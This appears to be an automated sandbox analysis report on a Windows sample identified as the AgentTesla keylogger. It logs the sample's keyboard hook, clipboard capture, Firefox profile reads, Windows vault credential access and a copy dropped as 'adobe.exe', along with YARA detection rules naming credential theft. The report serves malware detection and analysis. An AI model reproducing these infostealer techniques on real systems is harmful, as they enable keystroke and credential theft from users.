Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.11:49725 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\ukBQ4ch2nE.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exe	Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 1_2_0316DEE4	1_2_0316DEE4
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 1_2_05870007	1_2_05870007
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 1_2_05870040	1_2_05870040
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_00B9F208	2_2_00B9F208
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_00B9B3A3	2_2_00B9B3A3
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_00B9E320	2_2_00B9E320
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_00B94A90	2_2_00B94A90
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_00B93E78	2_2_00B93E78
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_00B941C0	2_2_00B941C0
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_065E2A5A	2_2_065E2A5A
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_065E2A68	2_2_065E2A68
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_06636238	2_2_06636238
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_066330A8	2_2_066330A8
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_066351E8	2_2_066351E8
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_0663C1D8	2_2_0663C1D8
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_0663AE6A	2_2_0663AE6A
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_0663591B	2_2_0663591B
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_066379C8	2_2_066379C8
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_0663E400	2_2_0663E400
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_066372E8	2_2_066372E8
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_06630040	2_2_06630040
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_06630007	2_2_06630007
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_0144DEE4	4_2_0144DEE4
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_05590040	4_2_05590040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_05590006	4_2_05590006
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_013AE0F8	5_2_013AE0F8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_013AE8A9	5_2_013AE8A9
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_013A4A90	5_2_013A4A90
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_013A3E78	5_2_013A3E78
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_013A41C0	5_2_013A41C0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_013AADA8	5_2_013AADA8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B76638	5_2_06B76638
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B734A8	5_2_06B734A8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B755E8	5_2_06B755E8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B77DC8	5_2_06B77DC8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B7B26F	5_2_06B7B26F
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B7C1D8	5_2_06B7C1D8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B776E8	5_2_06B776E8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B7E400	5_2_06B7E400
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B75D1B	5_2_06B75D1B
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B70040	5_2_06B70040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06C62462	5_2_06C62462
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06C62468	5_2_06C62468
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06B70006	5_2_06B70006
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0100DEE4	7_2_0100DEE4
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_029CE0F8	8_2_029CE0F8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_029C4A90	8_2_029C4A90
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_029CE8A9	8_2_029CE8A9
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_029C3E78	8_2_029C3E78
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_029C41C0	8_2_029C41C0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_029CADA8	8_2_029CADA8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066F6638	8_2_066F6638
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066F34A8	8_2_066F34A8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066F55E8	8_2_066F55E8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066F7DC8	8_2_066F7DC8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066FB26F	8_2_066FB26F
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066FC1D8	8_2_066FC1D8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066F76E8	8_2_066F76E8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066FE400	8_2_066FE400
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066F5D1B	8_2_066F5D1B
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066F0040	8_2_066F0040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_066F0006	8_2_066F0006

Source: ukBQ4ch2nE.exe, 00000001.00000000.1568968404.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFanto.exe, vs ukBQ4ch2nE.exe
Source: ukBQ4ch2nE.exe, 00000001.00000002.1576675585.000000000149E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ukBQ4ch2nE.exe
Source: ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSoftwareGame.dll: vs ukBQ4ch2nE.exe
Source: ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed9e9e37e-59b8-4cab-97db-2b15f3b5cf75.exe4 vs ukBQ4ch2nE.exe
Source: ukBQ4ch2nE.exe, 00000001.00000002.1579542545.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed9e9e37e-59b8-4cab-97db-2b15f3b5cf75.exe4 vs ukBQ4ch2nE.exe
Source: ukBQ4ch2nE.exe, 00000002.00000002.4033798596.00000000007D9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ukBQ4ch2nE.exe
Source: ukBQ4ch2nE.exe, 00000002.00000002.4034617232.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ukBQ4ch2nE.exe
Source: ukBQ4ch2nE.exe	Binary or memory string: OriginalFilenameFanto.exe, vs ukBQ4ch2nE.exe

Source: ukBQ4ch2nE.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@2/2

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

File created: C:\Users\user\AppData\Roaming\adobe\adobe.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Mutant created: NULL

Source: ukBQ4ch2nE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ukBQ4ch2nE.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ukBQ4ch2nE.exe	Virustotal: Detection: 75%
Source: ukBQ4ch2nE.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

File read: C:\Users\user\Desktop\ukBQ4ch2nE.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ukBQ4ch2nE.exe "C:\Users\user\Desktop\ukBQ4ch2nE.exe"
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process created: C:\Users\user\Desktop\ukBQ4ch2nE.exe "C:\Users\user\Desktop\ukBQ4ch2nE.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process created: C:\Users\user\Desktop\ukBQ4ch2nE.exe "C:\Users\user\Desktop\ukBQ4ch2nE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winhttp.dll	Jump to behavior
